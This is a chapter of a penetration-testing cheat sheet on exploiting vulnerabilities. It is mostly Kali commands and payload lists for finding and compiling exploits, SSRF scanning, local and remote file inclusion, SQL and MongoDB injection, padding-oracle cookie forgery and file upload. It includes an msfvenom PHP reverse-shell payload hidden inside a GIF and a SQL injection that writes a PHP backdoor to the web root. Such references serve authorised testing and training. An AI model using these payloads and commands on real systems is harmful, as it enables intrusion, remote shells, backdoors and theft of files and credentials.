Chapter 3 - Exploiting Vulnerabilities
That was the division in the hacking world: There were people who were exploring it and the people who were trying to make money from it. And, generally, you stayed away from anyone who was trying to make money from it.
— Jeff Moss
Finding Exploits
Search Exploit-DB
Kali> searchsploit windows 2003 | grep -i local
Search Google
Google> site:exploit-db.com exploit kernel <= 3
Search Metasploit
Kali> grep -R "W7" /usr/share/metasploit-framework/modules/exploit/windows/*
Search Vulners
Compiling Exploits
Compile for Windows
Kali> i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe
Compile for Architectures
Kali> gcc -m32 -o output32 hello.c (32 bit)
Kali> gcc -m64 -o output hello.c (64 bit)
Breaking out of Virtualization
WebSockets
IPV6
HTTP
Resources
Cracking the Lens: Attacking HTTPs hidden attack surface
How I hacked hundreds of companies through their helpdesk
Headers
Send fake IP
Kali> curl --header "X-Forwarded-For: 192.168.1.1" http://$TARGET
XXE
Resources
Exploitation: XML External Entity (XXE) Injection
Exploiting a Real-World XXE Vulnerability
Exploiting XXE Vulnerabilities in file parsing
XSS
Resources
XSS Attack: Busting browsers to root
CORS
Resources
CSRF
Resources
Computerphile: Cross Site Request Forgery
Updating Anti-CSRF Tokens with BurpSuite
SSRF
Resources
What is Server side Request Forgery?
Exploiting Server Side Request Forgery on a Node/Express Application (hosted on Amazon EC2)
Example
Sometimes what appears to be RFI can lead to SSRF, here are some commands to help
# Port scan the internal resources available
Kali> wfuzz -c -z range,1-65535 --filter "l>2" http://$TARGET/proxy.php?path=localhost:FUZZ
# If you find one, dirbust it.
Kali> wfuzz -c -w /usr/share/wordlists/dirb/big.txt --filter "l>11" http://$TARGET:8080/FUZZ
RCE
Resources
Node.js Remote Code Execution as a Service
Exploiting Python code execution in the web
Utilizing Code Re-use or ROP in PHP Exploits
Pwning PHP Mail Function for fun and RCE
Server Side Template Injection
Resources
Server Side Template Injection
Server Side Template Injection: RCE for the Modern WebApp
API
Resources
LFI
Resources
Local File Inclusion Testing Techniques
Insecure PHP Functions & their Exploits (LFI/RFI)
LFI and RFI -- The Website Security Vulnerability
Local File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code Execution Advanced Exploitation PROC Shortcuts
Examples
file:///etc/passwd
../../../etc/passwd
php://filter/convert.base64-encode/resource=admin.php
php://filter/convert.base64-encode/resource=../../../../../etc/passwd
php://input
send post data
expect://whoami
Open Redirects
Resources
RFI
Kali> echo "<?php phpinfo(); ?>" > evil.txt
http://$TARGET/index.php?path=http://$ATTACKER/evil.txt
Padding Oracle Attack
Resources
Automated Padding Oracle Attacks with Padbuster
Arguments
url - first argument is the URL
encrypted - second argument is the encrypted text
bits - third argument is the number of bits per block
-cookies - define a cookie to use
-plaintext - plaintext to encrypt
Examples
Kali> padBuster.pl http://$TARGET "ENC-COOKIE-TEXT" 8
-cookies "ENC-COOKIE"
-plaintext '{"user":"admin","role":"admin"}'
AWS
Resources
AWS PENETRATION TESTING PART 1. S3 BUCKETS
File Upload
Make a backdoor GIF
# As a note, try to overwrite the magic bytes of your backdoor with a valid image
# so that the check will validate. This includes Content-Type.
Kali> msfvenom --list | grep php
Kali> msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.15.237 LPORT=54321 -o evil.php
Kali> echo “FFD8FFEo” | xxd -r -p > evil.gif
Kali> cat evil.php >> evil.gif
Upload From CLI
Kali> curl -X POST
-F "field1=test"
-F "file=@/home/user/evil.gif"
http://$TARGET/upload.php
--cookie "cookie"
Resources
How to Bypass E-Mail gateways using common payloads
iSCSI
Resources
An interesting route to domain admin via ISCSI
Databases
MySQL
Resources
SQLMap tricks for advanced SQL injeciton
Examples
username'--
1'||'1'<'2
'OR 1=1;--
'OR 1=1;#
'OR 1=1 LIMIT 1; #
AND 1 = 2 UNION SELECT 1,2,3,4,5
1'1
1 exec sp_ (or exec xp_)
1 and 1=1
1' and 1=(select count(*) from tablenames); --
1 or 1=1
1' or '1'='1
1or1=1
1'or'1'='1
fake@ema'or'il.nl'='il.nl
1 union all select 1,2,3,4,load_file("/etc/passwd"),6
1 union all select 1,2,3,4,"<?php ?>",6 into outfile '/var/www/html/backdoor.php'
MSSQL
Resources
SQL Injection Cheatsheet MSSQL
MongoDB
Resources
Examples
true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1'
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
{$gt: ''}
[$ne]=1
';sleep(5000);
';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);
PBX
Resources
Introduction to Telephony and PBX
Examples
Kali> svmap $TARGET
Kali> svwar -m INVITE -eSTART-END $TARGET